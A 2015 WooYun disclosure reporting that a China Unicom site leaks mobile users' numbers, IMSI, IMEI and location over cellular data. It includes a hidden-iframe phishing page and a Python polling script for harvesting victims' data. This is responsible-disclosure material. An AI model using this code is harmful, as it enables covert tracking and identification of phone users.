利用中国联通所属机构某系统接口缺陷在非Wi-Fi环境下可导致部分手机信息和LBS信息泄露风险

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-090676

漏洞标题：利用中国联通所属机构某系统接口缺陷在非Wi-Fi环境下可导致部分手机信息和LBS信息泄露风险

漏洞作者：路人甲

提交时间：2015-01-08 16:04

修复时间：2015-02-22 16:06

公开时间：2015-02-22 16:06

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-08：细节已通知厂商并且等待厂商处理中
2015-01-13：厂商已经确认，细节仅向厂商公开
2015-01-23：细节向核心白帽子及相关领域专家公开
2015-02-02：细节向普通白帽子公开
2015-02-12：细节向实习白帽子公开
2015-02-22：细节向公众公开

简要描述：

利用中国联通所属机构某系统接口缺陷在非Wi-Fi环境下可导致部分手机信息和LBS信息泄露风险

详细说明：

http://www.unicomlabs.com/联通此站存在设计缺陷
手机使用3G或4G数据连接访问http://www.unicomlabs.com/ 可查询当前手机号、IMSI、上线基站号、上线小区号、地球座标、火星座标等
通过抓包我们发现当访问http://www.unicomlabs.com 时 response中iframe了一个链接
http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58
经测试发现如果手机使用3G或4G数据连接访问http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58

此时立即在电脑上同样打开此链接就能看到你的手机号、IMSI、上线基站号、上线小区号、地球座标、火星座标等信息

利用方法：将链接http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58嵌入到钓鱼页面中发给对方
本地监控该链接可获取对方的手机号等信息
这里我制作了一个html5的小游戏的钓鱼页面，可在微信朋友圈中分享，本地利用脚本实时监控即可。
主要代码：

<SCRIPT LANGUAGE="JavaScript"> 
<!-- 
function fresh(){ 
document.getElementById('frame0').src='http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58'; 
setTimeout("fresh()",5000);  
} 
setTimeout("fresh()",5000);  
//--> 
</SCRIPT> 
<iframe id="frame0" src="http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58"width="0" height="0" scrolling="yes" frameborder="0" style= "display :none " />

本地端用python写个脚本监控即可

import requests
import re
import sys
type = sys.getfilesystemencoding()
print '监听中...'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36'}
key = '无法检测号码'
for x in xrange(1,100000):
    r = requests.get('http://www.unicomlabs.com/Number.asp?unikey=660275b7d6ba757b74587343208f6003#',headers=headers)
    s = r.content.decode("gbk").encode(type)
    if(s.find(key)>0):
        print '第'+str(x)+'次请求'
    else:
        print '第'+str(x)+'次请求获取数据成功！】'
        f=open("un.html",'a')
        f.write(s+'\n\n')
        f.close()

漏洞证明：

获取到的数据

本机号码	18600*****7
IMSI	460010***6***67
我的话费	点击查看
承载网络	WCDMA
接入APN	3GNET
终端IMEI	355***05344***0
终端型号	HTC HTC 802w
生产厂商	HTC Corp
上线基站号	41**2
上线小区号	22**1
地球座标	E116.**01,N40.0**6
火星座标	E116.2**22,N40.0**86

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-01-13 11:57

厂商回复：

CNVD确认所述情况，将由CNCERT向中国联通通报。

漏洞评价：

2015-01-08 16:09 | 红客十年 ( 普通白帽子 | Rank:334 漏洞数:63 | 去年离职富士康，回到家中上蓝翔，蓝翔毕业...)

吓得我不敢用联通了……
2015-01-08 16:15 | 浩天 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

我被定位了
2015-01-08 16:16 | Finger ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗，任何自称Finger并...)

火星座标。。。
2015-01-08 16:35 | robots ( 路人 | 还没有发布任何漏洞 | www.baidu.com)

摩擦摩擦
2015-01-08 17:08 | zeracker ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

幸好，我的联通号已经不用了
2015-01-08 17:19 | 小黑猫 ( 路人 | Rank:2 漏洞数:1 | 小黑猫)

哈哈。uninet也行吗？
2015-01-08 19:03 | 过客 ( 实习白帽子 | Rank:42 漏洞数:13 )

这个屌
2015-01-08 19:08 | 小黑猫 ( 路人 | Rank:2 漏洞数:1 | 小黑猫)

@zeracker 你用的电信？
2015-01-08 19:25 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者，关注web安全。)

但愿移动别出这个洞！伤不起！
2015-01-09 08:50 | 酸奶、 ( 普通白帽子 | Rank:182 漏洞数:27 )

吓尿的节奏。
2015-01-09 09:02 | jackbak ( 路人 | Rank:2 漏洞数:2 | 致知力行学以致用追求卓越简洁高效)

火了
2015-01-09 09:40 | aygj1412 ( 路人 | 还没有发布任何漏洞 | 只有神知道的世界)

联通这爆出来的那么多？
2015-01-11 12:14 | 理工小强 ( 路人 | Rank:2 漏洞数:1 | 学一行恨一行,目前从事无线行业。)

联通：沃我嘞个去
2015-01-13 13:41 | 姿势不行 ( 路人 | Rank:22 漏洞数:7 | 我是爱卖萌的小阿狸呀http://www.qinqinyo....)

联通：沃在这儿
2015-01-26 10:16 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

我的话费点击查看莫非还可以查到话费？给力
2015-02-05 09:13 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

竟然没人关注：中共中央党校！
2015-02-05 11:02 | 北京方便面 ( 核心白帽子 | Rank:876 漏洞数:66 | 我爱吃北京方便面)

@zzR 我擦暴露位置了。。。
2015-02-05 11:14 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

@北京方便面你看你就这样暴露啦-0-
2015-02-14 04:17 | 廷廷 ( 路人 | Rank:0 漏洞数:1 | 有很强的好奇心，爱好广泛，求女女带走。。...)

大神暴露了，虽然只是了测试
2015-02-17 15:12 | North ( 路人 | Rank:15 漏洞数:5 | 123456789)

我去。。离我住的这么近。。
2015-02-22 16:21 | 咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )

火星坐标是什么鬼。。。。。。。
2015-02-22 16:52 | 世纪缘 ( 路人 | Rank:2 漏洞数:3 | 专注无线网络安全！)

前段时间不是说过这个漏洞了？

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-090676

漏洞标题：利用中国联通所属机构某系统接口缺陷在非Wi-Fi环境下可导致部分手机信息和LBS信息泄露风险

相关厂商：中国联通

漏洞作者：路人甲

提交时间：2015-01-08 16:04

修复时间：2015-02-22 16:06

公开时间：2015-02-22 16:06

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-090676

漏洞标题：利用中国联通所属机构某系统接口缺陷在非Wi-Fi环境下可导致部分手机信息和LBS信息泄露风险

相关厂商：中国联通

漏洞作者： 路人甲

提交时间：2015-01-08 16:04

修复时间：2015-02-22 16:06

公开时间：2015-02-22 16:06

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-090676"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云